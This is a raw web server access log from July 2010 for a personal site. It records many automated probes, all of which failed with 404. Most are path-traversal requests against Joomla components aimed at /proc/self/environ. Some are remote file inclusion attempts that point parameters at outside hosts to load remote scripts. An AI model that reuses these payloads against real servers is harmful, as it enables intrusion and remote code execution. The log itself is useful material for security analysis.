206.214.220.151 - - [29/Jul/2010:09:13:38 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
206.214.220.151 - - [29/Jul/2010:09:13:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
173.201.16.52 - - [29/Jul/2010:09:13:56 -0700] "GET / HTTP/1.0" 200 2293 "-" "-" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:15:55 -0700] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:15:55 -0700] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
118.45.190.166 - - [29/Jul/2010:09:16:18 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ada-basket.com//galeries/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
118.45.190.166 - - [29/Jul/2010:09:16:18 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ada-basket.com//galeries/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
118.45.190.166 - - [29/Jul/2010:09:16:18 -0700] "GET /logs/access_100716.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ada-basket.com//galeries/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
118.45.190.166 - - [29/Jul/2010:09:18:09 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ada-basket.com//galeries/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
118.45.190.166 - - [29/Jul/2010:09:18:10 -0700] "GET /logs/access_100719.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ada-basket.com//galeries/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
118.45.190.166 - - [29/Jul/2010:09:18:10 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ada-basket.com//galeries/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:18:12 -0700] "GET /logs/access_100721.log//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:18:12 -0700] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:18:13 -0700] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:18:15 -0700] "GET /logs/access_100721.log//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:18:15 -0700] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:18:16 -0700] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
118.45.190.166 - - [29/Jul/2010:09:18:32 -0700] "GET /logs/access_100715.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ada-basket.com//galeries/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
66.249.65.49 - - [29/Jul/2010:09:18:41 -0700] "GET /wp-login.php?redirect_to=http%3A%2F%2Fsonyafatah.com%2Fblog%2F2006%2F08%2F14%2Fabout%2F HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "sonyafatah.com"
118.45.190.166 - - [29/Jul/2010:09:19:12 -0700] "GET /logs/access_100721.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ada-basket.com//galeries/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:09:19:31 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:21:33 -0700] "GET /logs/access_100721.log//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:21:33 -0700] "GET /logs/access_100721.log//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:21:33 -0700] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:21:34 -0700] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:21:34 -0700] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:21:34 -0700] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:09:22:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:23:25 -0700] "GET /logs/access_100717.log//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:23:28 -0700] "GET /logs/access_100717.log//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:09:24:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:09:25:49 -0700] "GET /logs/access_100715.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:09:25:49 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:09:25:50 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:26:29 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:09:27:02 -0700] "GET /logs/access_100628.log//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:09:27:12 -0700] "GET /logs/access_100717.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
72.55.140.4 - - [29/Jul/2010:09:27:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
72.55.140.4 - - [29/Jul/2010:09:27:57 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
72.55.140.4 - - [29/Jul/2010:09:27:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:09:30:04 -0700] "GET /logs/access_100715.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:09:30:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:09:30:05 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:31:15 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:09:32:58 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:09:32:58 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:09:33:03 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:09:33:34 -0700] "GET /logs/access_100719.log/%22?option=com_ckforms&controller=%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:09:33:35 -0700] "GET /%22?option=com_ckforms&controller=%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:09:33:35 -0700] "GET /logs/%22?option=com_ckforms&controller=%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
188.165.217.175 - - [29/Jul/2010:09:34:04 -0700] "GET /logs/access_100701.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
188.165.217.175 - - [29/Jul/2010:09:34:04 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
188.165.217.175 - - [29/Jul/2010:09:34:04 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:09:35:13 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:09:35:13 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:09:35:13 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:35:39 -0700] "GET /logs/access_100628.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:35:40 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:35:40 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:09:36:14 -0700] "GET /logs/access_100721.log/%22?option=com_ckforms&controller=%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:09:36:48 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.28.112.47 - - [29/Jul/2010:09:37:02 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
208.43.40.176 - - [29/Jul/2010:09:37:03 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
174.121.192.28 - - [29/Jul/2010:09:37:05 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
78.41.233.128 - - [29/Jul/2010:09:37:46 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
208.43.40.176 - - [29/Jul/2010:09:38:24 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
208.115.111.247 - - [29/Jul/2010:09:38:36 -0700] "GET /logs/access_100517.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sonyafatah.com"
208.115.111.247 - - [29/Jul/2010:09:38:40 -0700] "GET /logs/access_100518.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sonyafatah.com"
208.115.111.247 - - [29/Jul/2010:09:38:44 -0700] "GET /logs/access_100519.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:38:46 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
208.115.111.247 - - [29/Jul/2010:09:38:47 -0700] "GET /logs/access_100520.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sonyafatah.com"
208.115.111.247 - - [29/Jul/2010:09:39:01 -0700] "GET /logs/access_100521.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sonyafatah.com"
208.115.111.247 - - [29/Jul/2010:09:38:53 -0700] "GET /logs/access_100522.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sonyafatah.com"
208.115.111.247 - - [29/Jul/2010:09:38:57 -0700] "GET /logs/access_100523.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sonyafatah.com"
72.55.140.4 - - [29/Jul/2010:09:38:58 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
208.115.111.247 - - [29/Jul/2010:09:39:00 -0700] "GET /logs/access_100524.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sonyafatah.com"
174.121.192.28 - - [29/Jul/2010:09:39:00 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
72.55.140.4 - - [29/Jul/2010:09:39:01 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
72.55.140.4 - - [29/Jul/2010:09:39:01 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
78.41.233.128 - - [29/Jul/2010:09:39:03 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
208.115.111.247 - - [29/Jul/2010:09:39:03 -0700] "GET /logs/access_100525.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sonyafatah.com"
208.115.111.247 - - [29/Jul/2010:09:39:07 -0700] "GET /logs/access_100526.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:41:14 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
67.28.112.47 - - [29/Jul/2010:09:41:20 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:09:41:21 -0700] "GET /blog/index.php/category/india/page/2/ HTTP/1.0" 200 85674 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:09:41:26 -0700] "GET /wp-content/themes/default/style.css HTTP/1.0" 404 - "http://sonyafatah.com/blog/category/india/page/2/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:09:41:29 -0700] "GET /wp-content/plugins/falbum/falbum.css HTTP/1.0" 404 - "http://sonyafatah.com/blog/category/india/page/2/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:09:41:42 -0700] "GET /logs/access_100715.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:09:41:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:09:41:43 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:42:01 -0700] "GET /logs/access_100720.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:42:01 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:42:01 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:42:10 -0700] "GET /logs/access_100720.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:42:10 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:42:10 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:09:42:26 -0700] "GET /logs/access_100628.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:09:42:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:09:42:27 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:09:42:36 -0700] "GET /logs/access_100719.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:09:43:08 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:09:43:11 -0700] "GET /logs/access_100717.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:09:43:28 -0700] "GET /logs/access_100628.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:09:43:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:09:43:28 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:09:43:39 -0700] "GET /logs/access_100719.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:09:43:51 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:46:40 -0700] "GET /logs/access_100719.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:46:41 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:46:41 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
69.10.143.68 - - [29/Jul/2010:09:46:51 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "sonyafatah.com"
